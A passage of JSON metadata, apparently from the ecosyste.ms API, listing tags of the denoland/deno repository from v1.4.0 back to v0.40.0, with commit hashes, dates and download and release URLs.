l,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://rep